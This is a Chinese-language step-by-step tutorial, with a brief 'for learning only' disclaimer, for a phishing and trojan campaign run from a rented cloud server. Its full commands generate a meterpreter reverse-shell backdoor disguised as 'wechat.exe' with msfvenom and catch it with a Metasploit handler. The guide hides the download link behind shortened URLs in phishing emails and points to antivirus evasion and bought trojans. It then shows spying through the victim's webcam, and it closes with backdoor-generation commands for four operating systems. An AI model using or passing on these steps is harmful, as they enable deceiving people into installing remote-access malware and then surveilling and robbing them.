声明:内容仅供学习,请勿违法使用,违者后果自负
一.部署云服务器
购买一台云服务器,Windows( 中文 )版本即可 华为云官网:https://www.huaweicloud.com/ 登录后进入控制台购买完成后远程登录云服务器
二.部署WEB运行环境
1.windows云服务器上下载并安装phpstudy 2.安装完之后选择:WAMP 环境,进行开启
phpstudy下载:
phpStudy_64.zip
http://8.141.81.195/NTD/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E9%92%93%E9%B1%BC%E4%B8%8E%E6%9C%A8%E9%A9%AC%E5%AE%9E%E6%88%98/media/phpstudy_64.zip
通过华为云服务器公网IP地址进行访问:在任意能够联网的设备浏览器中输入:http://华为云公网IP例子:http://124.70.93.88/
三.上传钓鱼网站代码文件,钓鱼网站伪装
代码文件下载,下载完成后上传到云服务器:C:\phpstudy_pro\WWW目录下,通过访问云服务器IP地址的 方式即可访问到网站页面
修改phpstudy配置,设置默认首页为index.html(删除index.php)
在线生成二维码:网址二维码生成器_网址静态码活码批量在线制作_互联二维码
将公网IP放进去,转换成二维码
四.生成meterpreter后门
网站上可以放置后门程序,用户在访问时直接会进行下载,如果是Kali Linux服务器上可以使用msfvenom 和MSF工具生成并监听,Windows可以下载以下软件(运行在Windows下的MSF):
http://8.141.81.195/NTD/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E9%92%93%E9%B1%BC%E4%B8%8E%E6%9C%A8%E9%A9%AC%E5%AE%9E%E6%88%98/media/metasploitframework-latest.msi
metasploitframework-latest.msihttp://8.141.81.195/NTD/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E9%92%93%E9%B1%BC%E4%B8%8E%E6%9C%A8%E9%A9%AC%E5%AE%9E%E6%88%98/media/metasploitframework-latest.msi
下载后安装在windows云服务器中,进入到MSF bin目录下: cmd中输入:cd C:\metasploit-framework\binmsfvenom -p windows/meterpreter/reverse_tcp lhost=自己华为云服务器的公网IP lport= 4444 -f exe -o wechat.exe 将wechat.exe上传到云服务器web网站根目录中 用户访问 http://华为云IP/wechat.exe 即可下载后门程序(注意,用户主机需要关掉杀毒 软件与自带的病毒防御)在华为云服务器中监听后门上线: 运行C:\metasploit-framework\bin\msfconsole.bat程序 msf6 > use exploit/multi/handler msf6 > set payload windows/meterpreter/reverse_tcp msf6 > set lhost 华为云公网IP msf6 > set lport 4444 msf6 > run生成后在华为云服务器管理界面配置安全规则
五.邮件钓鱼,链接伪装
将上一步骤的后门程序wechat.exe上传到web网站根目录(C:\phpstudy_pro\WWW)下用户可以通过以下链接下载后门程序:华为云服务器公网IP/ wechat.exe但是如果发送此链接给到用户,会较容易被识破,所以可以重新生成新链接: 访问以下网站,生成新的链接: 在线地址转换:https://www.bejson.com/convert/shorturl/将生成的新链接,构造成钓鱼邮件发送给用户:一些伪装技术: exe捆绑技术一些免杀技术: 加壳,加花指令... 网站上使用加密货币购买能够绕过杀毒软件的木马....
六.钓鱼效果验证
在华为云服务器上进入msf 输入:use exploit/multi/hancler set payload windows/meterpreter/reverse_tcp set lhost 华为云公网IP set lport 4444 run开始监听,出现meterpreter > 字样代表监听成功 后续即可进行屏幕共享,屏幕截图,监控摄像头了 监控摄像头: meterpreter > webcam_stream
Firefox-latest.exe
http://8.141.81.195/NTD/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E9%92%93%E9%B1%BC%E4%B8%8E%E6%9C%A8%E9%A9%AC%E5%AE%9E%E6%88%98/media/firefox-latest.exe
附:Msfvenom生成不同系统后门命令
Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 -f exe > 木马名.exeLinux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 -f elf > 木马名Android: msfvenom -p android/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 R > 木马名.apkMacOS: msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的IP LPORT=你的端口 -f macho > 木马名.macho